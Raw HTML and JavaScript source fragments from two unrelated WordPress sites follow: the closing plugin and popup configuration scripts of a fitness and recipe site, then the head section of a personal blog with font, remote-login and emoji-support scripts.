{"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","nonce":"66715d83be","datepicker":{"dateFormat":"yy-mm-dd","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"firstDay":"1","isRTL":false}}; var wpurp_timer = {"icons":{"pause":"<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" x=\"0px\" y=\"0px\" width=\"24px\" height=\"24px\" viewBox=\"0 0 24 24\"><g >\n<path fill=\"#fffefe\" d=\"M9,2H4C3.4,2,3,2.4,3,3v18c0,0.6,0.4,1,1,1h5c0.6,0,1-0.4,1-1V3C10,2.4,9.6,2,9,2z\"\/>\n<path fill=\"#fffefe\" d=\"M20,2h-5c-0.6,0-1,0.4-1,1v18c0,0.6,0.4,1,1,1h5c0.6,0,1-0.4,1-1V3C21,2.4,20.6,2,20,2z\"\/>\n<\/g><\/svg>","play":"<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" x=\"0px\" y=\"0px\" width=\"24px\" height=\"24px\" viewBox=\"0 0 24 24\"><g >\n<path fill=\"#fffefe\" d=\"M6.6,2.2C6.3,2,5.9,1.9,5.6,2.1C5.2,2.3,5,2.6,5,3v18c0,0.4,0.2,0.7,0.6,0.9C5.7,22,5.8,22,6,22\nc0.2,0,0.4-0.1,0.6-0.2l12-9c0.3-0.2,0.4-0.5,0.4-0.8s-0.1-0.6-0.4-0.8L6.6,2.2z\"\/>\n<\/g><\/svg>","close":"<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" x=\"0px\" y=\"0px\" width=\"24px\" height=\"24px\" viewBox=\"0 0 24 24\"><g >\n<path fill=\"#fffefe\" d=\"M22.7,4.3l-3-3c-0.4-0.4-1-0.4-1.4,0L12,7.6L5.7,1.3c-0.4-0.4-1-0.4-1.4,0l-3,3c-0.4,0.4-0.4,1,0,1.4L7.6,12\nl-6.3,6.3c-0.4,0.4-0.4,1,0,1.4l3,3c0.4,0.4,1,0.4,1.4,0l6.3-6.3l6.3,6.3c0.2,0.2,0.5,0.3,0.7,0.3s0.5-0.1,0.7-0.3l3-3\nc0.4-0.4,0.4-1,0-1.4L16.4,12l6.3-6.3C23.1,5.3,23.1,4.7,22.7,4.3z\"\/>\n<\/g><\/svg>"}}; var wpurp_unit_conversion = {"alias_to_unit":{"kg":"kilogram","kilogram":"kilogram","kilograms":"kilogram","g":"gram","gram":"gram","grams":"gram","mg":"milligram","milligram":"milligram","milligrams":"milligram","lb":"pound","lbs":"pound","pound":"pound","pounds":"pound","oz":"ounce","ounce":"ounce","ounces":"ounce","l":"liter","liter":"liter","liters":"liter","dl":"deciliter","deciliter":"deciliter","deciliters":"deciliter","cl":"centiliter","centiliter":"centiliter","centiliters":"centiliter","ml":"milliliter","milliliter":"milliliter","milliliters":"milliliter","gal":"gallon","gallon":"gallon","gallons":"gallon","qt":"quart","quart":"quart","quarts":"quart","pt":"pint","pint":"pint","pints":"pint","cup":"cup","cups":"cup","cu":"cup","c":"cup","floz":"fluid_ounce","fluidounce":"fluid_ounce","fluidounces":"fluid_ounce","flounce":"fluid_ounce","flounces":"fluid_ounce","fluid_ounce":"fluid_ounce","tablespoon":"tablespoon","tablespoons":"tablespoon","tbsp":"tablespoon","tbsps":"tablespoon","tbls":"tablespoon","tb":"tablespoon","tbs":"tablespoon","T":"tablespoon","t":"teaspoon","teaspoon":"teaspoon","teaspoons":"teaspoon","tsp":"teaspoon","tsps":"teaspoon","ts":"teaspoon","m":"meter","meter":"meter","meters":"meter","cm":"centimeter","centimeter":"centimeter","centimeters":"centimeter","mm":"millimeter","millimeter":"millimeter","millimeters":"millimeter","yd":"yard","yard":"yard","yards":"yard","ft":"foot","foot":"foot","feet":"foot","in":"inch","inch":"inch","inches":"inch"},"unit_to_type":{"kilogram":"weight","gram":"weight","milligram":"weight","pound":"weight","ounce":"weight","liter":"volume","deciliter":"volume","centiliter":"volume","milliliter":"volume","gallon":"volume","quart":"volume","pint":"volume","cup":"volume","fluid_ounce":"volume","tablespoon":"volume","teaspoon":"volume","meter":"length","centimeter":"length","millimeter":"length","yard":"length","foot":"length","inch":"length"},"universal_units":["tablespoon","teaspoon"],"systems":[{"name":"Metric","units_weight":["kilogram","gram","milligram"],"units_volume":["liter","deciliter","centiliter","milliliter"],"units_length":["meter","centimeter","millimeter"],"cup_type":"236.6"},{"name":"US Imperial","units_weight":["pound","ounce"],"units_volume":["gallon","quart","pint","cup","fluid_ounce"],"units_length":["yard","foot","inch"],"cup_type":"236.6"}],"unit_abbreviations":{"kilogram":"kg","gram":"g","milligram":"mg","pound":"lb","ounce":"oz","liter":"l","deciliter":"dl","centiliter":"cl","milliliter":"ml","gallon":"gal","quart":"qt","pint":"pt","cup":"cup","fluid_ounce":"floz","tablespoon":"tablespoon","teaspoon":"teaspoon","meter":"m","centimeter":"cm","millimeter":"mm","yard":"yd","foot":"ft","inch":"in"},"user_abbreviations":{"kilogram":{"singular":"kg","plural":"kg"},"gram":{"singular":"g","plural":"g"},"milligram":{"singular":"mg","plural":"mg"},"pound":{"singular":"lb","plural":"lb"},"ounce":{"singular":"oz","plural":"oz"},"liter":{"singular":"l","plural":"l"},"deciliter":{"singular":"dl","plural":"dl"},"centiliter":{"singular":"cl","plural":"cl"},"milliliter":{"singular":"ml","plural":"ml"},"gallon":{"singular":"gal","plural":"gal"},"quart":{"singular":"qt","plural":"qt"},"pint":{"singular":"pt","plural":"pt"},"cup":{"singular":"cup","plural":"cup"},"fluid_ounce":{"singular":"floz","plural":"floz"},"tablespoon":{"singular":"tablespoon","plural":"tablespoon"},"teaspoon":{"singular":"teaspoon","plural":"teaspoon"},"meter":{"singular":"m","plural":"m"},"centimeter":{"singular":"cm","plural":"cm"},"millimeter":{"singular":"mm","plural":"mm"},"yard":{"singular":"yd","plural":"yd"},"foot":{"singular":"ft","plural":"ft"},"inch":{"singular":"in","plural":"in"}}}; var wpurp_user_menus = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","addonUrl":"https:\/\/beingbadass.com\/wp-content\/plugins\/wp-ultimate-recipe-premium\/premium\/addons\/user-menus","nonce":"118b88bb3f","consolidate_ingredients":"1","adjustable_system":"1","default_system":"1","static_systems":[0],"checkboxes":"1","ingredient_notes":"","fractions":"","print_recipe_list":"1","print_recipe_list_header":"<tr><th>Recipe<\/th><th>Servings<\/th><\/tr>","custom_print_shoppinglist_css":"button {\n color: #ffffff;\n}"}; var wpurp_add_to_shopping_list = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","nonce":"1599a594eb"}; var wpurp_user_ratings = {"ajax_url":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","nonce":"60ce760df8"}; var wpurp_recipe_form = {"coreUrl":"https:\/\/beingbadass.com\/wp-content\/plugins\/wp-ultimate-recipe-premium\/core"}; var wpurp_user_submissions = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","nonce":"1153baef13","confirm_message":"Are you sure you want to delete this recipe:"};</script> <script type='text/javascript'>var wpupg_public = {"ajax_url":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php?wpupg_ajax=1","animationSpeed":"0.8s","animationShow":{"opacity":"1"},"animationHide":{"opacity":"0"},"nonce":"06e126be67","rtl":"","dropdown_hide_search":"","link_class":""};</script> <script type='text/javascript'>var oceanwpLocalize = {"isRTL":"","menuSearchStyle":"drop_down","sidrSource":"#sidr-close, #mobile-nav, #mobile-menu-search","sidrDisplace":"1","sidrSide":"left","sidrDropdownTarget":"icon","verticalHeaderTarget":"icon","customSelects":".woocommerce-ordering .orderby, #dropdown_product_cat, .widget_categories select, .widget_archive select, .single-product .variations_form .variations select","ajax_url":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php"};</script> <script type='text/javascript'>var tve_dash_front = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php","force_ajax_send":"1","is_crawler":""};</script> <script type='text/javascript'>var pum_vars = {"version":"1.8.3","ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php","restapi":"https:\/\/beingbadass.com\/wp-json\/pum\/v1","rest_nonce":null,"default_theme":"13158","debug_mode":"","disable_tracking":"","home_url":"\/","message_position":"top","core_sub_forms_enabled":"1","popups":[]}; var ajaxurl = "https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php"; var pum_debug_vars = {"debug_mode_enabled":"Popup Maker: Debug Mode Enabled","debug_started_at":"Debug started at:","debug_more_info":"For more information on how to use this information visit https:\/\/docs.wppopupmaker.com\/?utm_medium=js-debug-info&utm_campaign=ContextualHelp&utm_source=browser-console&utm_content=more-info","global_info":"Global Information","localized_vars":"Localized variables","popups_initializing":"Popups Initializing","popups_initialized":"Popups Initialized","single_popup_label":"Popup: #","theme_id":"Theme ID: ","label_method_call":"Method Call:","label_method_args":"Method Arguments:","label_popup_settings":"Settings","label_triggers":"Triggers","label_cookies":"Cookies","label_delay":"Delay:","label_conditions":"Conditions","label_cookie":"Cookie:","label_settings":"Settings:","label_selector":"Selector:","label_mobile_disabled":"Mobile Disabled:","label_tablet_disabled":"Tablet Disabled:","label_event":"Event: %s","triggers":{"click_open":"Click Open","auto_open":"Time Delay \/ Auto Open"},"cookies":{"on_popup_close":"On Popup Close","on_popup_open":"On Popup Open","pum_sub_form_success":"Subscription Form: Successful","pum_sub_form_already_subscribed":"Subscription Form: Already Subscribed","manual":"Manual JavaScript"}}; var pum_sub_vars = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php","message_position":"top"}; var pum_popups = {"pum-14673":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"click_open","settings":{"cookie_name":"","extra_selectors":""}}],"theme_id":"13210","size":"medium","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"fade","animation_speed":"350","animation_origin":"center top","location":"center top","position_top":"100","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"theme_slug":"opaque-theme","id":14673,"slug":"liana-test-webinar-replay-popup"},"pum-13953":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"click_open","settings":{"cookie_name":"","extra_selectors":""}}],"theme_id":"13210","size":"medium","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"fade","animation_speed":"350","animation_origin":"center top","location":"center top","position_top":"100","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"theme_slug":"opaque-theme","id":13953,"slug":"webinar-registration"},"pum-13164":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"click_open","settings":{"cookie_name":"","extra_selectors":".button_3guide"}}],"theme_id":"13180","size":"tiny","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"fade","animation_speed":"350","animation_origin":"center top","location":"center top","position_top":"100","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"theme_slug":"test-theme","id":13164,"slug":"imi"},"pum-13357":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"click_open","settings":{"cookie_name":"","extra_selectors":""}}],"theme_id":"13210","size":"medium","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"fade","animation_speed":"350","animation_origin":"center top","location":"center top","position_top":"100","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"theme_slug":"opaque-theme","id":13357,"slug":"beautycounter-optin"},"pum-13217":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"click_open","settings":{"cookie_name":"","extra_selectors":""}}],"theme_id":"13210","size":"tiny","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"fade","animation_speed":"350","animation_origin":"center top","location":"center","position_top":"100","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"theme_slug":"opaque-theme","id":13217,"slug":"lose-weight"},"pum-13204":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":true,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"click_open","settings":{"cookie_name":"","extra_selectors":""}}],"theme_id":"13210","size":"tiny","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"50%","custom_height":"380%","animation_type":"fade","animation_speed":"350","animation_origin":"center top","location":"center","position_top":"100","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"theme_slug":"opaque-theme","id":13204,"slug":"gear-guide"},"pum-13212":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":false,"overlay_disabled":false,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"click_open","settings":{"cookie_name":"","extra_selectors":""}}],"theme_id":"13210","size":"tiny","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"fade","animation_speed":"350","animation_origin":"center top","location":"center","position_top":"50","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","cookies":[],"theme_slug":"opaque-theme","id":13212,"slug":"your-body-is-a-work-of-art"}};</script> <!--[if lt IE 9]> <script type='text/javascript' src='https://beingbadass.com/wp-content/themes/oceanwp/assets/js//third/html5.min.js?ver=1.6.4'></script> <![endif]--> <script type='text/javascript'>var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/beingbadass.com\/wp-admin\/admin-ajax.php","nonce":"6a9fa02743","shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"google":{"title":"Google+","has_counter":true},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"delicious":{"title":"Delicious"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"en_US","app_id":""}};</script> <script type='text/javascript'>var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"version":"2.5.10","urls":{"assets":"https:\/\/beingbadass.com\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"general":{"elementor_global_image_lightbox":"yes","elementor_enable_lightbox_in_editor":"yes"}},"post":{"id":5416,"title":"Home","excerpt":""}};</script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'>_stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.1.1',blog:'34077613',post:'5416',tz:'-5',srv:'beingbadass.com'} ]); _stq.push([ 'clickTrackerInit', '34077613', '5416' ]);</script> <script type="text/javascript" defer src="https://beingbadass.com/wp-content/cache/autoptimize/js/autoptimize_a44f4cbc197649809d7cef5ce3729ef8.js"></script></body></html>
0
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://wilsregister.com/xmlrpc.php"> <title>Wil&#039;s Register</title> <script type="text/javascript"> WebFontConfig = {"google":{"families":["Merriweather:r:latin,latin-ext"]}}; (function() { var wf = document.createElement('script'); wf.src = 'https://s0.wp.com/wp-content/plugins/custom-fonts/js/webfont.js'; wf.type = 'text/javascript'; wf.async = 'true'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wf, s); })(); </script><style id="jetpack-custom-fonts-css">.wf-active h1{font-style:normal;font-weight:400}.wf-active .site-title{font-family:"Merriweather",serif;font-weight:400;font-style:normal}.wf-active .site-description{font-family:"Merriweather",serif;font-style:normal;font-weight:400}.wf-active .widget-title{font-family:"Merriweather",serif;font-weight:400;font-style:normal}.wf-active .archive-title, .wf-active .entry-title, .wf-active .page-title{font-family:"Merriweather",serif;font-weight:400;font-style:normal}.wf-active .post-layout-columns .post-wrapper .post-column article .entry-title{font-style:normal;font-weight:400}.wf-active .comment-reply-title span, .wf-active .comments-header .comments-title{font-family:"Merriweather",serif;font-weight:400;font-style:normal}@media (max-width: 80em){.wf-active .site-description{font-style:normal;font-weight:400}}@media (max-width: 70em){.wf-active .post-layout-columns .post-wrapper .post-column article .entry-title{font-style:normal;font-weight:400}}@media (max-width: 60em){.wf-active .site-description{font-style:normal;font-weight:400}}@media (max-width: 60em){.wf-active .archive-title, .wf-active .entry-title, .wf-active .page-title{font-style:normal;font-weight:400}}@media (max-width: 60em){.wf-active .post-layout-columns .post-wrapper .post-column article .entry-title{font-style:normal;font-weight:400}}</style> <!-- Async WordPress.com Remote Login --> <script id="wpcom_remote_login_js"> var wpcom_remote_login_extra_auth = ''; function wpcom_remote_login_remove_dom_node_id( element_id ) { var dom_node = document.getElementById( element_id ); if ( dom_node ) { dom_node.remove(); } } function wpcom_remote_login_remove_dom_node_classes( class_name ) { var dom_nodes = document.querySelectorAll( '.' + class_name ); for ( var i = 0; i < dom_nodes.length; i++ ) { dom_nodes[i].remove(); } } function wpcom_remote_login_final_cleanup() { wpcom_remote_login_remove_dom_node_classes( "wpcom_remote_login_msg" ); wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_key" ); wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_validate" ); wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_js" ); wpcom_remote_login_remove_dom_node_id( "wpcom_request_access_iframe" ); wpcom_remote_login_remove_dom_node_id( "wpcom_request_access_styles" ); } // Watch for messages back from the remote login window.addEventListener( "message", function( e ) { if ( e.origin === "https://r-login.wordpress.com" ) { var data = {}; try { data = JSON.parse( e.data ); } catch( e ) { wpcom_remote_login_final_cleanup(); return; } if ( data.msg === 'LOGIN' ) { // Clean up the login check iframe wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_key" ); var id_regex = new RegExp( /^[0-9]+$/ ); var token_regex = new RegExp( /^.*|.*|.*$/ ); if ( token_regex.test( data.token ) && id_regex.test( data.wpcomid ) ) { // We have everything we need to ask for a login var script = document.createElement( "script" ); script.setAttribute( "id", "wpcom_remote_login_validate" ); script.src = '/remote-login.php?wpcom_remote_login=validate' + '&wpcomid=' + data.wpcomid + '&token=' + encodeURIComponent( data.token ) + '&host=' + window.location.protocol + '//' + window.location.hostname; document.body.appendChild( script ); } return; } // Safari ITP, not logged in, so redirect if ( data.msg === 'LOGIN-REDIRECT' ) { window.location = 'https://wordpress.com/log-in?redirect_to=' + window.location.href; return; } // Safari ITP, storage access failed, remove the request if ( data.msg === 'LOGIN-REMOVE' ) { var css_zap = 'html { -webkit-transition: margin-top 1s; transition: margin-top 1s; } /* 9001 */ html { margin-top: 0 !important; } * html body { margin-top: 0 !important; } @media screen and ( max-width: 782px ) { html { margin-top: 0 !important; } * html body { margin-top: 0 !important; } }'; var style_zap = document.createElement( 'style' ); style_zap.type = 'text/css'; style_zap.appendChild( document.createTextNode( css_zap ) ); document.body.appendChild( style_zap ); var e = document.getElementById( 'wpcom_request_access_iframe' ); e.parentNode.removeChild( e ); document.cookie = 'wordpress_com_login_access=denied; path=/; max-age=31536000'; return; } // Safari ITP if ( data.msg === 'REQUEST_ACCESS' ) { console.log( 'request access: safari' ); // Check ITP iframe enable/disable knob if ( wpcom_remote_login_extra_auth !== 'safari_itp_iframe' ) { return; } // If we are in a "private window" there is no ITP. var private_window = false; try { var opendb = window.openDatabase( null, null, null, null ); } catch( e ) { private_window = true; } if ( private_window ) { console.log( 'private window' ); return; } var iframe = document.createElement( 'iframe' ); iframe.id = 'wpcom_request_access_iframe'; iframe.setAttribute( 'scrolling', 'no' ); iframe.setAttribute( 'sandbox', 'allow-storage-access-by-user-activation allow-scripts allow-same-origin allow-top-navigation-by-user-activation' ); iframe.src = 'https://r-login.wordpress.com/remote-login.php?wpcom_remote_login=request_access&origin=' + encodeURIComponent( data.origin ) + '&wpcomid=' + encodeURIComponent( data.wpcomid ); var css = 'html { -webkit-transition: margin-top 1s; transition: margin-top 1s; } /* 9001 */ html { margin-top: 46px !important; } * html body { margin-top: 46px !important; } @media screen and ( max-width: 660px ) { html { margin-top: 71px !important; } * html body { margin-top: 71px !important; } #wpcom_request_access_iframe { display: block; height: 71px !important; } } #wpcom_request_access_iframe { border: 0px; height: 46px; position: fixed; top: 0; left: 0; width: 100%; min-width: 100%; z-index: 99999; background: #23282d; } '; var style = document.createElement( 'style' ); style.type = 'text/css'; style.id = 'wpcom_request_access_styles'; style.appendChild( document.createTextNode( css ) ); document.body.appendChild( style ); document.body.appendChild( iframe ); } if ( data.msg === 'DONE' ) { wpcom_remote_login_final_cleanup(); } } }, false ); // Inject the remote login iframe after the page has had a chance to load // more critical resources window.addEventListener( "DOMContentLoaded", function( e ) { var iframe = document.createElement( "iframe" ); iframe.style.display = "none"; iframe.setAttribute( "scrolling", "no" ); iframe.setAttribute( "id", "wpcom_remote_login_key" ); iframe.src = "https://r-login.wordpress.com/remote-login.php" + "?wpcom_remote_login=key" + "&origin=aHR0cHM6Ly93aWxzcmVnaXN0ZXIuY29t" + "&wpcomid=149995575" + "&time=1558023913"; document.body.appendChild( iframe ); }, false ); </script> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//s1.wp.com' /> <link rel='dns-prefetch' href='//twosevenproductions.wordpress.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel="alternate" type="application/rss+xml" title="Wil&#039;s Register &raquo; Feed" href="https://wilsregister.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Wil&#039;s Register &raquo; Comments Feed" href="https://wilsregister.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function () { oldonload(); func(); } } } /* ]]> */ </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s1.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1556893897h&ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='all-css-0-1' href='https://s0.wp.com/_static/??-eJx9UMuSAiEM/CEx62s9WX4Lw8QxSoAioabm72V8HXSXC9VpujvVgTEZF4NiUOBiki8DBYExuchGmDxOH9PSiSzgb5unKwpcUJN1V3OfWnIKJwqk0xu8xRScL33NqgT0JAqdj/fILts8gejkcckUWvEuZqw8J6uzgrEnix65ylo2Tr8v1wzPtUqzxeM6XZcyipj6MhU2eq6Lvn0PGp4q0Ji1DPbZp7FkwICZ6sc/cPYe+bDa7fbr7Wq/+bncACL/spg=?cssminify=yes' type='text/css' media='all' /> <link rel='stylesheet' id='tortuga-default-fonts-css' href='https://fonts.googleapis.com/css?family=Titillium+Web%3A400%2C400italic%2C700%2C700italic%7COpen+Sans%3A400%2C400italic%2C700%2C700italic&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='all-css-2-1' href='https://s0.wp.com/_static/??-eJx9jEsKwzAMBS9UVxiSki5Kz2IbVVGRrWAr9PpxNv1QyG4G5j1gKGqctLQ3nFNrJ3gtrothMcirW2Ql7g2hOtEUjLX8iHtI4Ho0rRhFqSNBr770aBTSfh5D/dBfbjNmbDAPQKIxyB7c882P/nKdRj9Mzw06w1UE?cssminify=yes' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var tortuga_menu_title = "Menu"; /* ]]> */ </script> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyFj9EKwjAMRX/IWnQbPonfUmesqWtam3RDv94O5sOwKAQCySHnRk9RIfVDvgBrV+qRIT2XtnW80b8A5dEmI7D1SB+4DyRAMrMxsHhgNhYqWx/OOIDKDKkAJEVzDRVuHQlpRJj+Yg4kmv6uEjC+vuxyg5JLxwQes9cSkmRr5itkRrRGMFDteY5Yna/dC3Xyx13XtfumObStewOiUIbx'></script> <link rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1530132353h&cssminify=yes' type='text/css' media='all' /> <!--[if lt IE 8]> <link rel='stylesheet' id='highlander-comments-ie7-css' href='https://s2.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1351637563h&#038;ver=20110606' type='text/css' media='all' /> <![endif]--> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://twosevenproductions.wordpress.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" 